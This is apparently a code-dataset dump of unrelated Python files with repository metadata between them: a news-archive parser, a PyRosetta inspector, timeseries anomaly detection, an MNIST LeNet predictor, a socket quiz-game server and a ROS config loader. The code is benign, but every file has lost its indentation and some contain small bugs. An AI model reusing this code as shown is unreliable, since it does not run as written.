def fix_encoding(text):
# MOT: <NAME>ikä\r\ntoimittaja <NAME>en\r\nensiläh. 24.1.2011
return ftfy.fix_text(text, uncurl_quotes=False)
def clean_markdown(text):
# [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä
# kosketinsoittaja **Janne** toivoisi
html = markdown(text)
text = ''.join(BeautifulSoup(html, features="lxml").findAll(text=True))
return text
def main(args):
zip_ = zipfile.ZipFile(args.zipfile)
fnames = zip_.namelist()
num_files = len(fnames)
counter = 0
print("Parsing job started..")
for fname in fnames:
counter += 1
df = pd.DataFrame(
columns=['doc_id', 'yle_id', 'url', 'published', 'text'])
# Reading json data
if not fname.endswith(".json"):
print("Skipping file ", fname)
continue
with zip_.open(fname) as f:
try:
data = json.loads(f.read().decode("utf-8"))
except json.decoder.JSONDecodeError:
print("Error reading file, skipping ", fname)
for article in data["data"]:
# Metadata
metadata = {
'doc_id': counter,
'yle_id': article["id"],
'url': article["url"]["full"],
'published': article["datePublished"]
}
# Article content
for paragraph in article["content"]:
# skip images etc.
if paragraph["type"] not in ["text", "heading"]:
text = "N/A"
continue
# 'text' = ['resource', {'id': '6385775'}]
if paragraph["type"] == "heading" and isinstance(paragraph["text"], list):
text = "N/A"
print("skipped paragraph element", paragraph["text"])
continue
text = paragraph["text"].strip()
# slows down, but if there's no hurry then the text will be cleaner
text = fix_encoding(text)
text = clean_markdown(text)
# Parsed data dictionary
parsed_data = {
**metadata,
'text': text
}
df = df.append(parsed_data, ignore_index=True)
# Making output directory
try:
output_fullpath = os.path.join(args.outputdir, fname)
os.makedirs(os.path.dirname(output_fullpath), exist_ok=True)
output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files
except Exception as e:
print("Error creating output path!")
print(e)
# Saving dataframe as pickle
df.to_pickle(output_fullpath)
if counter % 5 == 0:
print("Parsed {x}/{y} files..".format(x=counter, y=num_files))
print("Finished parsing.")
if __name__ == "__main__":
argparser = argparse.ArgumentParser(
description='Yle news archive reader - parse archive data to Pandas dataframes')
argparser.add_argument('--zipfile', default="./data/ylenews-fi-2011-2018-src.zip",
help='zipfile downloaded from kielipankki')
argparser.add_argument('--outputdir', default="./data/parsed/",
help='output directory for parsed dataframes')
args = argparser.parse_args()
main(args)
| 2.890625 | 3 |
pyrosetta_documentarian/attributes.py | matteoferla/Pyrosetta-documentarian | 1 | 12794302 | import pyrosetta
import pandas as pd
from typing import Tuple, List, Dict, Set, Any, Optional, Sequence
from .base import BaseDocumentarian
class AttributeDocumentarian(BaseDocumentarian):
"""
Analyses a Pyrosetta object and determines what is different from default.
For example. Give a working XML script:
>>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser()
>>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml')
>>> protocol.apply(pose)
One can reverse engineer it, thusly:
>>> pm = protocol.get_mover(1)
>>> print(pm.mover_name()) # mover called in script!
>>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame
---------------------------
Attributes:
* target: instance
* target_cls: class
* base: The tuple of classes inherited (``__mro__``)
* uninherited: The set of attributes that are absent in the parent class
* citation: string of citation
Methods:
* describe(): describe attributes
* test(): calls the methods
* compare(): compares the results of a ``test()`` to that of a blank instance
"""
@property
def uninherited(self) -> Set[str]:
"""
The set of attributes that are absent in the parent class.
Has no idea if other were overwritten though!
:rtype: Set[str]
"""
if len(self.base) > 1:
return set(dir(self.base[0])) - set(dir(self.base[1]))
def describe(self, iterable: Optional[Sequence[str]] = None) -> None:
"""
Describe attributes by calling help.
If ``iterable`` is provided, it will print only those.
"""
if iterable is None:
iterable = dir(self.target)
for methodname in iterable:
print(f'## {methodname}')
method = getattr(self.target, methodname)
help(method)
def test(self,
iterable: Optional[Sequence[str]] = None,
silent: bool = True) -> Dict[str, Any]:
"""
Calls without arguments the methods.
If ``iterable`` is provided, it will call only those.
Returns a dictionary of the results.
"""
if iterable is None:
iterable = dir(self.target)
results = {}
for methodname in iterable:
method = getattr(self.target, methodname)
try:
result = method()
results[methodname] = result
if silent is False:
print(f'Calling worked for {methodname}: {result}')
except TypeError as error:
results[methodname] = 'N/A'
if silent is False:
print(f'Calling failed for {methodname}: {result}')
return results
def test_uninherited(self, silent: bool = True) -> dict:
"""
Calls without arguments the methods that where not inherited.
"""
return self.test(self.uninherited, silent)
def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:
"""
Tests the methods (see ``test()`` and compares them to a generic instance
or to ``reference`` if provided.
"""
c = self.test()
if reference is None:
reference = self.target_cls()
refexplorer = self.__class__(reference)
r = refexplorer.test()
return self._make_table(c, r)
def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:
"""
Tests the uninherited methods (see ``test()`` and compares them to a generic instance
or to ``reference`` if provided.
"""
c = self.test_uninherited()
if reference is None:
reference = self.target_cls()
refexplorer = self.__class__(reference)
r = refexplorer.test_uninherited()
return self._make_table(c, r)
def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame:
assert case, f'make_table cannot make a table without data (case={case}, ref={ref})'
proto = [{'attribute': k,
'target': ref[k],
'reference': case[k],
'equal': str(ref[k]) == str(case[k])} for k in case.keys()]
comparison = pd.DataFrame(proto)
return comparison.set_index(['attribute'])
| 2.984375 | 3 |
mlprimitives/candidates/timeseries_errors.py | Hector-hedb12/MLPrimitives | 0 | 12794303 | import more_itertools as mit
import numpy as np
# Methods to do dynamic error thresholding on timeseries data
# Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf
def get_forecast_errors(y_hat,
y_true,
window_size=5,
batch_size=30,
smoothing_percent=0.05,
smoothed=True):
"""
Calculates the forecasting error for two arrays of data. If smoothed errors desired,
runs EWMA.
Args:
y_hat (list): forecasted values. len(y_hat)==len(y_true).
y_true (list): true values. len(y_hat)==len(y_true).
window_size (int):
batch_size (int):
smoothing_percent (float):
smoothed (bool): whether the returned errors should be smoothed with EWMA.
Returns:
(list): error residuals. Smoothed if specified by user.
"""
errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)]
if not smoothed:
return errors
historical_error_window = int(window_size * batch_size * smoothing_percent)
moving_avg = []
for i in range(len(errors)):
left_window = i - historical_error_window
right_window = i + historical_error_window + 1
if left_window < 0:
left_window = 0
if right_window > len(errors):
right_window = len(errors)
moving_avg.append(np.mean(errors[left_window:right_window]))
return moving_avg
def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer):
"""
Extracts anomalies from the errors.
Args:
y_true ():
smoothed_errors ():
window_size (int):
batch_size (int):
error_buffer (int):
Returns:
"""
if len(y_true) <= batch_size * window_size:
raise ValueError("Window size (%s) larger than y_true (len=%s)."
% (batch_size, len(y_true)))
num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size)
anomalies_indices = []
for i in range(num_windows + 1):
prev_index = i * batch_size
curr_index = (window_size * batch_size) + (i * batch_size)
if i == num_windows + 1:
curr_index = len(y_true)
window_smoothed_errors = smoothed_errors[prev_index:curr_index]
window_y_true = y_true[prev_index:curr_index]
epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer)
window_anom_indices = get_anomalies(
window_smoothed_errors,
window_y_true,
sd_threshold,
i,
anomalies_indices,
error_buffer
)
# get anomalies from inverse of smoothed errors
# This was done in the implementation of NASA paper but
# wasn't referenced in the paper
# we get the inverse by flipping around the mean
mu = np.mean(window_smoothed_errors)
smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors]
epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer)
inv_anom_indices = get_anomalies(
smoothed_errors_inv,
window_y_true,
sd_inv,
i,
anomalies_indices,
len(y_true)
)
anomalies_indices = list(set(anomalies_indices + inv_anom_indices))
anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices])
# group anomalies
anomalies_indices = sorted(list(set(anomalies_indices)))
anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)]
anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]]
# generate "scores" for anomalies based on the max distance from epsilon for each sequence
anomalies_scores = []
for e_seq in anomaly_sequences:
denominator = np.mean(smoothed_errors) + np.std(smoothed_errors)
score = max([
abs(smoothed_errors[x] - epsilon) / denominator
for x in range(e_seq[0], e_seq[1])
])
anomalies_scores.append(score)
return anomaly_sequences, anomalies_scores
def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0):
"""Helper method for `extract_anomalies` method.
Calculates the epsilon (threshold) for anomalies.
"""
mu = np.mean(smoothed_errors)
sigma = np.std(smoothed_errors)
max_epsilon = 0
sd_threshold = sd_limit
# The treshold is determined dynamically by testing multiple Zs.
# z is drawn from an ordered set of positive values representing the
# number of standard deviations above mean(smoothed_errors)
# here we iterate in increments of 0.5 on the range that the NASA paper found to be good
for z in np.arange(2.5, sd_limit, 0.5):
epsilon = mu + (sigma * z)
below_epsilon, below_indices, above_epsilon = [], [], []
for i in range(len(smoothed_errors)):
e = smoothed_errors[i]
if e < epsilon:
# save to compute delta mean and delta std
# these are important for epsilon calculation
below_epsilon.append(e)
below_indices.append(i)
if e > epsilon:
# above_epsilon values are anomalies
for j in range(0, error_buffer):
if (i + j) not in above_epsilon and (i + j) < len(smoothed_errors):
above_epsilon.append(i + j)
if (i - j) not in above_epsilon and (i - j) >= 0:
above_epsilon.append(i - j)
if len(above_epsilon) == 0:
continue
# generate sequences
above_epsilon = sorted(list(set(above_epsilon)))
groups = [list(group) for group in mit.consecutive_groups(above_epsilon)]
above_sequences = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]
mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu
sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma
epsilon = (mean_perc_decrease + sd_perc_decrease) /\
(len(above_sequences)**2 + len(above_epsilon))
# update the largest epsilon we've seen so far
if epsilon > max_epsilon:
sd_threshold = z
max_epsilon = epsilon
# sd_threshold can be multiplied by sigma to get epsilon
return max_epsilon, sd_threshold
def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer):
"""
Helper method to get anomalies.
"""
mu = np.mean(smoothed_errors)
sigma = np.std(smoothed_errors)
epsilon = mu + (z * sigma)
# compare to epsilon
errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies(
smoothed_errors,
epsilon,
y_true,
error_buffer,
window,
all_anomalies
)
if len(errors_seq) > 0:
anomaly_indices = prune_anomalies(
errors_seq,
smoothed_errors,
max_error_below_e,
anomaly_indices
)
return anomaly_indices
def group_consecutive_anomalies(smoothed_errors,
epsilon,
y_true,
error_buffer,
window,
all_anomalies,
batch_size=30):
upper_percentile, lower_percentile = np.percentile(y_true, [95, 5])
accepted_range = upper_percentile - lower_percentile
minimum_index = 100 # have a cutoff value for anomalies until model is trained enough
anomaly_indices = []
max_error_below_e = 0
for i in range(len(smoothed_errors)):
if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range:
# not an anomaly
continue
for j in range(error_buffer):
if (i + j) < len(smoothed_errors) and (i + j) not in anomaly_indices:
if (i + j) > minimum_index:
anomaly_indices.append(i + j)
if (i - j) < len(smoothed_errors) and (i - j) not in anomaly_indices:
if (i - j) > minimum_index:
anomaly_indices.append(i - j)
# get all the errors that are below epsilon and which
# weren't identified as anomalies to process them
for i in range(len(smoothed_errors)):
adjusted_index = i + (window - 1) * batch_size
if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies:
if i not in anomaly_indices:
max_error_below_e = smoothed_errors[i]
# group anomalies into continuous sequences
anomaly_indices = sorted(list(set(anomaly_indices)))
groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)]
e_seq = [(g[0], g[-1]) for g in groups if g[0] != g[-1]]
return e_seq, anomaly_indices, max_error_below_e
def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices):
""" Helper method that removes anomalies which don't meet
a minimum separation from next anomaly.
"""
# min accepted perc decrease btwn max errors in anomalous sequences
MIN_PERCENT_DECREASE = 0.05
e_seq_max, smoothed_errors_max = [], []
for error_seq in e_seq:
if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0:
sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]]
e_seq_max.append(max(sliced_errors))
smoothed_errors_max.append(max(sliced_errors))
smoothed_errors_max.sort(reverse=True)
if max_error_below_e > 0:
smoothed_errors_max.append(max_error_below_e)
indices_remove = []
for i in range(len(smoothed_errors_max)):
if i < len(smoothed_errors_max) - 1:
delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1]
perc_change = delta / smoothed_errors_max[i]
if perc_change < MIN_PERCENT_DECREASE:
indices_remove.append(e_seq_max.index(smoothed_errors_max[i]))
for index in sorted(indices_remove, reverse=True):
del e_seq[index]
pruned_indices = []
for i in anomaly_indices:
for error_seq in e_seq:
if i >= error_seq[0] and i <= error_seq[1]:
pruned_indices.append(i)
return pruned_indices
| 3.265625 | 3 |
mkt/webapps/utils.py | acidburn0zzz/zamboni | 1 | 12794304 | # -*- coding: utf-8 -*-
from collections import defaultdict
import commonware.log
from amo.utils import find_language
import mkt
log = commonware.log.getLogger('z.webapps')
def get_locale_properties(manifest, property, default_locale=None):
locale_dict = {}
for locale in manifest.get('locales', {}):
if property in manifest['locales'][locale]:
locale_dict[locale] = manifest['locales'][locale][property]
# Add in the default locale name.
default = manifest.get('default_locale') or default_locale
root_property = manifest.get(property)
if default and root_property:
locale_dict[default] = root_property
return locale_dict
def get_supported_locales(manifest):
"""
Returns a list of locales found in the "locales" property of the manifest.
This will convert locales found in the SHORTER_LANGUAGES setting to their
full locale. It will also remove locales not found in AMO_LANGUAGES.
Note: The default_locale is not included.
"""
return sorted(filter(None, map(find_language, set(
manifest.get('locales', {}).keys()))))
def dehydrate_content_rating(rating):
"""
{body.id, rating.id} to translated rating.label.
"""
try:
body = mkt.ratingsbodies.dehydrate_ratings_body(
mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])])
except TypeError:
# Legacy ES format (bug 943371).
return {}
rating = mkt.ratingsbodies.dehydrate_rating(
body.ratings[int(rating['rating'])])
return rating.label
def dehydrate_content_ratings(content_ratings):
"""Dehydrate an object of content ratings from rating IDs to dict."""
for body in content_ratings or {}:
# Dehydrate all content ratings.
content_ratings[body] = dehydrate_content_rating(content_ratings[body])
return content_ratings
def dehydrate_descriptors(keys, body=None):
"""
List of keys to lists of descriptor slugs by body.
['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}.
"""
results = defaultdict(list)
for key in keys:
obj = mkt.ratingdescriptors.RATING_DESCS.get(key)
if obj:
# Slugify and remove body prefix.
body, label = key.lower().replace('_', '-').split('-', 1)
if label != 'no-descs':
results[body].append(label)
return dict(results)
def dehydrate_interactives(keys):
"""
List of keys to list of interactive slugs.
['SOCIAL_NETWORKING', ...] to ['social-networking', ...].
"""
results = []
for key in keys:
obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)
if obj:
results.append(key.lower().replace('_', '-'))
return results
| 2.21875 | 2 |
modules/cli/getcli.py | serchaofan/oakleaf | 0 | 12794305 | <filename>modules/cli/getcli.py
import argparse
from modules import get, run
def parser_hosts_options(parser):
parser.add_argument("-g", "--group", help="Get Hosts from Group")
parser.set_defaults(func=get.print_hosts)
def parser_groups_options(parser):
parser.add_argument("-g", "--group", help="Get Group Info")
parser.set_defaults(func=get.print_groups)
| 2.609375 | 3 |
run.py | sepro/Flask-Server-Panel | 16 | 12794306 | <filename>run.py<gh_stars>10-100
#!/usr/bin/env python3
from serverpanel import create_app
app = create_app('config')
app.run()
| 1.367188 | 1 |
lenet5/mnist_predict.py | fubiye/machine-learning | 0 | 12794307 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 7 21:27:18 2019
@author: biyef
"""
from PIL import Image, ImageFilter
import tensorflow as tf
import matplotlib.pyplot as plt
import mnist_lenet5_backward
import mnist_lenet5_forward
import numpy as np
def imageprepare():
im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png')
plt.imshow(im)
plt.show()
#print(type(im.getdata()))
tv = list(im.getdata())
tva = [(255-x)*1.0/255.0 for x in tv]
#return np.asarray(im)
return tva
result=imageprepare()
#x = tf.placeholder(tf.float32, [None, 784])
#x = result
with tf.Graph().as_default() as g:
x = tf.placeholder(tf.float32,[1,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.NUM_CHANNELS])
#x = tf.placeholder(tf.float32, [None, 784])
#ipt = imageprepare()
#y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])
#y = mnist_lenet5_forward.forward(x,False,None)
# x = tf.placeholder(tf.float32,[
# [ipt],
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.NUM_CHANNELS])
# y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])
# y = mnist_lenet5_forward.forward(x,False,None)
#
# ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY)
# ema_restore = ema.variables_to_restore()
# saver = tf.train.Saver(ema_restore)
#
# correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
#image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png')
# image = tf.cast(image, tf.float32)
y_conv = mnist_lenet5_forward.forward(x,False,None)
#eva = mnist_lenet5_forward.forward([image],False,None)
#prediction = tf.argmax(y,1)
saver = tf.train.Saver()
with tf.Session(graph=g) as sess:
init_op = tf.global_variables_initializer()
sess.run(init_op)
ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH)
saver.restore(sess, ckpt.model_checkpoint_path)
reshaped_xs = np.reshape([result],(
1,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.NUM_CHANNELS))
# reshaped_x = np.reshape([ipt],(
# [ipt],
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.NUM_CHANNELS))
# accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]})
prediction=tf.argmax(y_conv,1)
predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess)
print('recognize result:')
print(predint[0]) | 2.71875 | 3 |
game/server/game_controller.py | adilnumancelik/cmpe487-final_project | 0 | 12794308 | import threading
import pickle
import json
import sys
import random
import uuid
import time
sys.path.append('..')
from game import Game, GameState
from utils import string_to_byte, byte_to_string
class GameController():
SPECIAL_KEYWORD = b"xaxaxayarmaW"
MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds
def __init__(self):
self.active_connections = [None, None]
self.game = Game(4, 4)
self.lock = threading.Lock()
self.receive_question_ts = [None, None]
self.both_players_received = False
self.calibration_acks = [[], []]
self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]]
self.ts_difference = 0 # Average difference between timestamps of player 0 and 1.
self.received_acks_cnt = [0, 0]
self.ping_difference = 0
self.ts_info = [{}, {}]
self.answer_ts = [None, None]
def add_connection(self, conn):
id = 1
if self.active_connections[0] == None:
id = 0
self.active_connections[id] = conn
return id
def remove_player(self, id):
with self.lock:
self.active_connections[id] = None
self.game.players_names[id] = None
self.game.reset_board()
self.calibration_acks = [[], []]
self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]]
self.ts_difference = 0
self.received_acks_cnt = [0, 0]
self.ping_difference = 0
self.notify_players()
def restart_game(self):
with self.lock:
self.game.reset_board()
self.generate_question()
self.notify_players()
def enter_name(self, id, name):
ready = False
def calibrate_timestamps(self):
def connection_thread(self, conn, id, i):
message = json.dumps({"TYPE": "CALIBRATION", "PAYLOAD": str(i)})
self.calibrations[id][i]["server_send"] = time.time()
conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD)
for i in range(10):
for idx, conn in enumerate(self.active_connections):
if conn:
threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start()
time.sleep(0.2)
with self.lock:
self.game.players_names[id] = name
self.send_id(id)
if self.game.players_names[1 - id] != None:
ready = True
if ready:
threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start()
def notify_players(self):
print("Sending Game information to the all players")
def connection_thread(self, conn, id):
if self.game.state == GameState.QUESTION:
self.ts_info[id][self.game.question_uuid] = {}
self.ts_info[id][self.game.question_uuid]["server_send"] = time.time()
conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD)
for idx, conn in enumerate(self.active_connections):
if conn:
threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start()
def generate_question(self):
print("Generating New Question...")
operator_list = ["+", "-", "*"]
operator = random.choice(operator_list)
limit = 20 if operator == "*" else 100
number_1 = random.randint(1, limit)
number_2 = random.randint(1, limit)
question = str(number_1) + operator + str(number_2)
answer = str(eval(question))
with self.lock:
self.game.state = GameState.QUESTION
self.game.question = question
self.game.answer = answer
self.game.question_uuid = str(uuid.uuid4())
self.receive_question_ts = [None, None]
self.both_players_received = False
self.answer_ts = [None, None]
print("Generated the Question: " + question + " / UUID: " + self.game.question_uuid)
def send_id(self, id):
conn = self.active_connections[id]
message = {
"TYPE": "ID",
"PAYLOAD": id
}
print(f"Sending ID to the Player {id}")
conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD)
def close_connections(self):
for conn in self.active_connections:
if conn:
conn.close()
def calculate_score(self, id, coordinate_x, coordinate_y, character):
directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]]
with self.lock:
self.game.board[coordinate_x][coordinate_y] = character
for x in range(coordinate_x - 1, coordinate_x + 2):
for y in range(coordinate_y - 1, coordinate_y + 2):
for direction in directions:
sequence = ""
sequence_coordinates = []
for i in range(3):
sequence_coordinates.append([x - (i - 1) * direction[0], y - (i - 1) * direction[1]])
if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \
sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col:
sequence = "NOO"
break
sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]]
if sequence == "SOS" and sequence_coordinates not in self.game.complete_lines:
self.game.scores[id] += 1
self.game.complete_lines.append(sequence_coordinates)
for coordinate in sequence_coordinates:
self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1])
def move(self, id, move):
with self.lock:
if self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received:
return
coordinate_x, coordinate_y, character = move
self.calculate_score(id, coordinate_x, coordinate_y, character)
self.generate_question()
self.notify_players()
def give_turn(self, id, question_uuid, duration):
print(f"Player {id} duration: {duration} seconds")
with self.lock:
if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid:
return
self.answer_ts[id] = duration
if self.answer_ts[1 - id]:
return
if not self.answer_ts[1 - id]:
time.sleep(abs(2 * self.ping_difference))
with self.lock:
self.game.state = GameState.MOVE
if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]:
self.game.turn = 1 - id
else:
self.game.turn = id
self.notify_players()
# Returns the normalized timestamp difference between acknowledgment of two players in seconds.
def get_timestamp_diff(self):
return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference)
def check_question_ack(self, id, client_rec, client_send, uuid):
self.ts_info[id][uuid]["server_rec"] = time.time()
self.ts_info[id][uuid]["client_rec"] = client_rec
self.ts_info[id][uuid]["client_send"] = client_send
with self.lock:
if self.game.state != GameState.QUESTION:
return
if self.game.question_uuid == uuid:
self.receive_question_ts[id] = client_rec
if self.receive_question_ts[1 - id]:
if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:
print("Both player has received the question " + uuid)
self.both_players_received = True
return
else:
return
else:
return
time.sleep(0.2)
with self.lock:
if self.game.question_uuid != uuid:
return
if self.receive_question_ts[1 - id]:
if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:
self.both_players_received = True
print("Both player has received the question " + uuid)
self.add_new_calibration_ts(uuid)
return
else:
self.add_new_calibration_ts(uuid)
self.generate_question()
self.notify_players()
def add_new_calibration_ts(self, uuid):
self.calibrations[0].append(self.ts_info[0][uuid])
self.calibrations[0] = self.calibrations[0][1:]
self.calibrations[1].append(self.ts_info[1][uuid])
self.calibrations[1] = self.calibrations[1][1:]
self.update_time_difference()
def update_time_difference(self):
ping0 = sum([(c["client_rec"]-c["server_send"]-c["client_send"]+c["server_rec"]) / 2 for c in self.calibrations[0][-6:]]) / 6
ping1 = sum([(c["client_rec"]-c["server_send"]-c["client_send"]+c["server_rec"]) / 2 for c in self.calibrations[1][-6:]]) / 6
print("Player 0 has a ping: ", ping0 * 1000, " ms")
print("Player 1 has a ping: ", ping1 * 1000, " ms")
self.ping_difference = ping0 - ping1
self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)]
delta0 = sum([(c["client_rec"]-c["server_send"]+c["client_send"]-c["server_rec"]) / 2 for c in self.calibrations[0][-6:]]) / 6
delta1 = sum([(c["client_rec"]-c["server_send"]+c["client_send"]-c["server_rec"]) / 2 for c in self.calibrations[1][-6:]]) / 6
self.ts_difference = delta0 - delta1
print("Calculated time difference in seconds is: ", self.ts_difference)
def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id):
self.calibrations[id][ack_id]["server_rec"] = time.time()
self.calibrations[id][ack_id]["client_rec"] = client_rec_ts
self.calibrations[id][ack_id]["client_send"] = client_send_ts
ready_to_start = False
with self.lock:
self.received_acks_cnt[id] += 1
if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10:
self.update_time_difference()
ready_to_start = True
if ready_to_start:
self.generate_question()
self.notify_players()
| 2.640625 | 3 |
5. Word error rate.py | srijoni68566/Dataset-preparation-for-training-deep-speech2-model-and-making-speech-to-text-conversion-system | 0 | 12794309 | from jiwer import wer
ground_truth = "কুমিল্লার খাদি সারা দেশে পরিচিত"
hypothesis = "কুমিল্লার খাদে সারা দেশে পরিচিত"
error = wer(ground_truth, hypothesis)
error
| 1.65625 | 2 |
default_cfg_fkie/src/default_cfg_fkie/default_cfg.py | Ryangupta8/multimaster_fkie | 0 | 12794310 | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
from multimaster_msgs_fkie.msg import Capability
from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch
from rosgraph.rosenv import ROS_NAMESPACE
from roslaunch import ROSLaunchConfig, XmlLoader
import os
import rosgraph.masterapi
import rosgraph.names
import roslib.names
import roslib.network
import rospy
import shlex
import std_srvs.srv
import subprocess
import sys
import threading
from .screen_handler import ScreenHandler # , ScreenHandlerException
class LoadException(Exception):
''' The exception throwing while searching for the given launch file. '''
pass
class StartException(Exception):
''' The exception throwing while run a node containing in the loaded configuration. '''
pass
class DefaultCfg(object):
def __init__(self):
self.nodes = []
'''@ivar: the list with names of nodes with name spaces.'''
self.sensors = {}
'''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}'''
self.robot_descr = ('', '', '')
'''@ivar: robot description as tupel of (type, name, text) '''
self.package = ''
self.file = ''
self.__lock = threading.RLock()
# Load parameter
self.launch_file = rospy.get_param('~launch_file', '')
rospy.loginfo("launch_file: %s" % self.launch_file)
self.package = rospy.get_param('~package', '')
rospy.loginfo("package: %s" % self.package)
self.do_autostart = rospy.get_param('~autostart', False)
rospy.loginfo("do_autostart: %s" % self.do_autostart)
self.load_params_at_start = rospy.get_param('~load_params_at_start', True)
self.parameter_loaded = False
rospy.loginfo("load_params_at_start: %s" % self.load_params_at_start)
self.argv = rospy.get_param('~argv', [])
rospy.loginfo("argv: %s" % self.argv)
if not isinstance(self.argv, list):
self.argv = ["%s" % self.argv]
